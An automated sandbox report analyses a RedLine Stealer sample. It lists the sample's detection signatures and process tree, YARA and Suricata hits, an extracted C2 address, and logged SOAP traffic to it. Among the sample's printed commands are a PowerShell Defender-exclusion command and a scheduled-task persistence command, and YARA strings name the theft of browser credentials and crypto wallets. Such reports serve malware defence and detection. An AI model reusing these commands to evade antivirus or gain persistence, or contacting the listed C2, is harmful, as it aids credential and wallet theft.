Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Uv4EriqDCj.exe

Overview

General Information

Sample name:Uv4EriqDCj.exe
renamed because original name is a hash value
Original sample name:2a0be8c3a23c505c1ddbe5502b63efc0.exe
Analysis ID:1615936
MD5:2a0be8c3a23c505c1ddbe5502b63efc0
SHA1:2eb3beabaab59a0a2dd4e3f66162e8e69a958df0
SHA256:36c202ffdedce9d3628023b9022dedeb664811708a7b4a6915eb89572ec4000d
Tags:exeRedLineStealeruser-abuse_ch
Infos:

Detection

RedLine
Score:100
Range:0 - 100
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected RedLine Stealer
.NET source code contains potential unpacker
.NET source code contains very large array initializations
Adds a directory exclusion to Windows Defender
C2 URLs / IPs found in malware configuration
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Loading BitLocker PowerShell Module
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Crypto Currency Wallets
Uses known network protocols on non-standard ports
Uses schtasks.exe or at.exe to add and modify task schedules
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • Uv4EriqDCj.exe (PID: 4340 cmdline: "C:\Users\user\Desktop\Uv4EriqDCj.exe" MD5: 2A0BE8C3A23C505C1DDBE5502B63EFC0)
    • powershell.exe (PID: 5568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 3428 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7544 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • powershell.exe (PID: 7140 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • schtasks.exe (PID: 2596 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • Uv4EriqDCj.exe (PID: 7328 cmdline: "C:\Users\user\Desktop\Uv4EriqDCj.exe" MD5: 2A0BE8C3A23C505C1DDBE5502B63EFC0)
      • conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • nXUcBcEOyROdbV.exe (PID: 7484 cmdline: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe MD5: 2A0BE8C3A23C505C1DDBE5502B63EFC0)
    • schtasks.exe (PID: 7684 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpBAFA.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7692 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • nXUcBcEOyROdbV.exe (PID: 7740 cmdline: "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe" MD5: 2A0BE8C3A23C505C1DDBE5502B63EFC0)
    • nXUcBcEOyROdbV.exe (PID: 7748 cmdline: "C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe" MD5: 2A0BE8C3A23C505C1DDBE5502B63EFC0)
      • conhost.exe (PID: 7764 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
RedLine StealerRedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
{"C2 url": ["185.222.58.36:55615"], "Bot Id": "cheat"}
SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_RedLine_1Yara detected RedLine StealerJoe Security
    dump.pcapJoeSecurity_RedLineYara detected RedLine StealerJoe Security
      SourceRuleDescriptionAuthorStrings
      0000000F.00000002.1907816017.0000000002FD0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
        00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
          00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RedLineYara detected RedLine StealerJoe Security
            00000008.00000002.1859795881.0000000000402000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_f54632ebunknownunknown
            • 0x133ca:$a4: get_ScannedWallets
            • 0x12228:$a5: get_ScanTelegram
            • 0x1304e:$a6: get_ScanGeckoBrowsersPaths
            • 0x10e6a:$a7: <Processes>k__BackingField
            • 0xed7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
            • 0x1079e:$a9: <ScanFTP>k__BackingField
            00000000.00000002.1751899883.000000000448A000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              Click to see the 22 entries
              SourceRuleDescriptionAuthorStrings
              0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpackJoeSecurity_RedLineYara detected RedLine StealerJoe Security
                  0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpackWindows_Trojan_RedLineStealer_f54632ebunknownunknown
                  • 0x135ca:$a4: get_ScannedWallets
                  • 0x12428:$a5: get_ScanTelegram
                  • 0x1324e:$a6: get_ScanGeckoBrowsersPaths
                  • 0x1106a:$a7: <Processes>k__BackingField
                  • 0xef7c:$a8: <GetWindowsVersion>g__HKLM_GetString|11_0
                  • 0x1099e:$a9: <ScanFTP>k__BackingField
                  0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpackinfostealer_win_redline_stringsFinds Redline samples based on characteristic stringsSekoia.io
                  • 0x119cb:$gen01: ChromeGetRoamingName
                  • 0x119ff:$gen02: ChromeGetLocalName
                  • 0x11a28:$gen03: get_UserDomainName
                  • 0x13c67:$gen04: get_encrypted_key
                  • 0x131e3:$gen05: browserPaths
                  • 0x1352b:$gen06: GetBrowsers
                  • 0x12e61:$gen07: get_InstalledInputLanguages
                  • 0x1064f:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
                  • 0x8738:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
                  • 0x9118:$spe6: windows-1251, CommandLine:
                  • 0x143bd:$spe9: *wallet*
                  • 0xee0c:$typ01: 359A00EF6C789FD4C18644F56C5D3F97453FFF20
                  • 0xef07:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
                  • 0xf264:$typ03: A937C899247696B6565665BE3BD09607F49A2042
                  • 0xf371:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
                  • 0xf4f0:$typ05: 4E3D7F188A5F5102BEC5B820632BBAEC26839E63
                  • 0xee98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
                  • 0xeec1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
                  • 0xf05f:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
                  • 0xf39a:$typ12: EB7EF1973CDC295B7B08FE6D82B9ECDAD1106AF2
                  • 0xf439:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
                  0.2.Uv4EriqDCj.exe.39fa250.0.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
                  • 0x1048a:$u7: RunPE
                  • 0x13b41:$u8: DownloadAndEx
                  • 0x9130:$pat14: , CommandLine:
                  • 0x13079:$v2_1: ListOfProcesses
                  • 0x1068b:$v2_2: get_ScanVPN
                  • 0x1072e:$v2_2: get_ScanFTP
                  • 0x1141e:$v2_2: get_ScanDiscord
                  • 0x1240c:$v2_2: get_ScanSteam
                  • 0x12428:$v2_2: get_ScanTelegram
                  • 0x124ce:$v2_2: get_ScanScreen
                  • 0x13216:$v2_2: get_ScanChromeBrowsersPaths
                  • 0x1324e:$v2_2: get_ScanGeckoBrowsersPaths
                  • 0x13509:$v2_2: get_ScanBrowsers
                  • 0x135ca:$v2_2: get_ScannedWallets
                  • 0x135f0:$v2_2: get_ScanWallets
                  • 0x13610:$v2_3: GetArguments
                  • 0x11cd9:$v2_4: VerifyUpdate
                  • 0x165ea:$v2_4: VerifyUpdate
                  • 0x139ca:$v2_5: VerifyScanRequest
                  • 0x130c6:$v2_6: GetUpdates
                  • 0x165cb:$v2_6: GetUpdates
                  Click to see the 20 entries

                  System Summary

                  barindex
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Uv4EriqDCj.exe", ParentImage: C:\Users\user\Desktop\Uv4EriqDCj.exe, ParentProcessId: 4340, ParentProcessName: Uv4EriqDCj.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe", ProcessId: 5568, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Uv4EriqDCj.exe", ParentImage: C:\Users\user\Desktop\Uv4EriqDCj.exe, ParentProcessId: 4340, ParentProcessName: Uv4EriqDCj.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe", ProcessId: 5568, ProcessName: powershell.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpBAFA.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpBAFA.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe, ParentImage: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exe, ParentProcessId: 7484, ParentProcessName: nXUcBcEOyROdbV.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpBAFA.tmp", ProcessId: 7684, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Uv4EriqDCj.exe", ParentImage: C:\Users\user\Desktop\Uv4EriqDCj.exe, ParentProcessId: 4340, ParentProcessName: Uv4EriqDCj.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp", ProcessId: 2596, ProcessName: schtasks.exe
                  Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Uv4EriqDCj.exe", ParentImage: C:\Users\user\Desktop\Uv4EriqDCj.exe, ParentProcessId: 4340, ParentProcessName: Uv4EriqDCj.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Uv4EriqDCj.exe", ProcessId: 5568, ProcessName: powershell.exe

                  Persistence and Installation Behavior

                  barindex
                  Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Uv4EriqDCj.exe", ParentImage: C:\Users\user\Desktop\Uv4EriqDCj.exe, ParentProcessId: 4340, ParentProcessName: Uv4EriqDCj.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\nXUcBcEOyROdbV" /XML "C:\Users\user\AppData\Local\Temp\tmpA9D3.tmp", ProcessId: 2596, ProcessName: schtasks.exe
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-15T18:11:24.845815+010020450001Malware Command and Control Activity Detected185.222.58.3655615192.168.2.449736TCP
                  2025-02-15T18:11:29.093409+010020450001Malware Command and Control Activity Detected185.222.58.3655615192.168.2.449739TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-15T18:11:32.947531+010020460561A Network Trojan was detected185.222.58.3655615192.168.2.449739TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-15T18:11:28.533081+010020450011Malware Command and Control Activity Detected185.222.58.3655615192.168.2.449736TCP
                  2025-02-15T18:11:32.947531+010020450011Malware Command and Control Activity Detected185.222.58.3655615192.168.2.449739TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-15T18:11:19.834054+010028496621Malware Command and Control Activity Detected192.168.2.449736185.222.58.3655615TCP
                  2025-02-15T18:11:24.130943+010028496621Malware Command and Control Activity Detected192.168.2.449739185.222.58.3655615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-15T18:11:25.052974+010028493511Malware Command and Control Activity Detected192.168.2.449736185.222.58.3655615TCP
                  2025-02-15T18:11:29.302897+010028493511Malware Command and Control Activity Detected192.168.2.449739185.222.58.3655615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-15T18:11:30.425990+010028482001Malware Command and Control Activity Detected192.168.2.449743185.222.58.3655615TCP
                  2025-02-15T18:11:34.841515+010028482001Malware Command and Control Activity Detected192.168.2.449750185.222.58.3655615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-15T18:11:28.936021+010028493521Malware Command and Control Activity Detected192.168.2.449741185.222.58.3655615TCP
                  2025-02-15T18:11:33.329917+010028493521Malware Command and Control Activity Detected192.168.2.449747185.222.58.3655615TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2025-02-15T18:11:19.834054+010018000001Malware Command and Control Activity Detected192.168.2.449736185.222.58.3655615TCP
                  2025-02-15T18:11:24.130943+010018000001Malware Command and Control Activity Detected192.168.2.449739185.222.58.3655615TCP

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Source: 8.2.Uv4EriqDCj.exe.400000.0.unpackMalware Configuration Extractor: RedLine {"C2 url": ["185.222.58.36:55615"], "Bot Id": "cheat"}
                  Source: C:\Users\user\AppData\Roaming\nXUcBcEOyROdbV.exeReversingLabs: Detection: 56%
                  Source: Uv4EriqDCj.exeVirustotal: Detection: 58%Perma Link
                  Source: Uv4EriqDCj.exeReversingLabs: Detection: 56%
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Source: Uv4EriqDCj.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 104.26.12.31:443 -> 192.168.2.4:49740 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.26.12.31:443 -> 192.168.2.4:49742 version: TLS 1.0
                  Source: Uv4EriqDCj.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Networking

                  barindex
                  Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49736 -> 185.222.58.36:55615
                  Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49736 -> 185.222.58.36:55615
                  Source: Network trafficSuricata IDS: 1800000 - Severity 1 - Joe Security MALWARE RedLine - Initial C&C Contact - SOAP CheckConnect : 192.168.2.4:49739 -> 185.222.58.36:55615
                  Source: Network trafficSuricata IDS: 2849662 - Severity 1 - ETPRO MALWARE RedLine - CheckConnect Request : 192.168.2.4:49739 -> 185.222.58.36:55615
                  Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49743 -> 185.222.58.36:55615
                  Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.36:55615 -> 192.168.2.4:49739
                  Source: Network trafficSuricata IDS: 2045000 - Severity 1 - ET MALWARE RedLine Stealer - CheckConnect Response : 185.222.58.36:55615 -> 192.168.2.4:49736
                  Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49739 -> 185.222.58.36:55615
                  Source: Network trafficSuricata IDS: 2849351 - Severity 1 - ETPRO MALWARE RedLine - EnvironmentSettings Request : 192.168.2.4:49736 -> 185.222.58.36:55615
                  Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49747 -> 185.222.58.36:55615
                  Source: Network trafficSuricata IDS: 2849352 - Severity 1 - ETPRO MALWARE RedLine - SetEnvironment Request : 192.168.2.4:49741 -> 185.222.58.36:55615
                  Source: Network trafficSuricata IDS: 2848200 - Severity 1 - ETPRO MALWARE RedLine - GetUpdates Request : 192.168.2.4:49750 -> 185.222.58.36:55615
                  Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.36:55615 -> 192.168.2.4:49736
                  Source: Network trafficSuricata IDS: 2045001 - Severity 1 - ET MALWARE Win32/LeftHook Stealer Browser Extension Config Inbound : 185.222.58.36:55615 -> 192.168.2.4:49739
                  Source: Network trafficSuricata IDS: 2046056 - Severity 1 - ET MALWARE Redline Stealer/MetaStealer Family Activity (Response) : 185.222.58.36:55615 -> 192.168.2.4:49739
                  Source: Malware configuration extractorURLs: 185.222.58.36:55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 55615
                  Source: unknownNetwork traffic detected: HTTP traffic on port 55615 -> 49750
                  Source: global trafficTCP traffic: 192.168.2.4:49736 -> 185.222.58.36:55615
                  Source: global trafficTCP traffic: 192.168.2.4:58505 -> 1.1.1.1:53
                  Source: global trafficTCP traffic: 192.168.2.4:65407 -> 162.159.36.2:53
                  Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /geoip HTTP/1.1Host: api.ip.sbConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.36:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/CheckConnect"Host: 185.222.58.36:55615Content-Length: 137Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.36:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.36:55615Content-Length: 982840Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings"Host: 185.222.58.36:55615Content-Length: 144Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.36:55615Content-Length: 982832Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment"Host: 185.222.58.36:55615Content-Length: 982684Expect: 100-continueAccept-Encoding: gzip, deflate
                  Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: text/xml; charset=utf-8SOAPAction: "http://tempuri.org/Endpoint/GetUpdates"Host: 185.222.58.36:55615Content-Length: 982676Expect: 100-continueAccept-Encoding: gzip, deflateConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 104.26.12.31 104.26.12.31
                  Source: Joe Sandbox ViewASN Name: ROOTLAYERNETNL ROOTLAYERNETNL
                  Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
                  Source: unknownHTTPS traffic detected: 104.26.12.31:443 -> 192.168.2.4:49740 version: TLS 1.0
                  Source: unknownHTTPS traffic detected: 104.26.12.31:443 -> 192.168.2.4:49742 version: TLS 1.0
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
                  Source: unknownTCP traffic detected without corresponding DNS query: 185.222.58.36
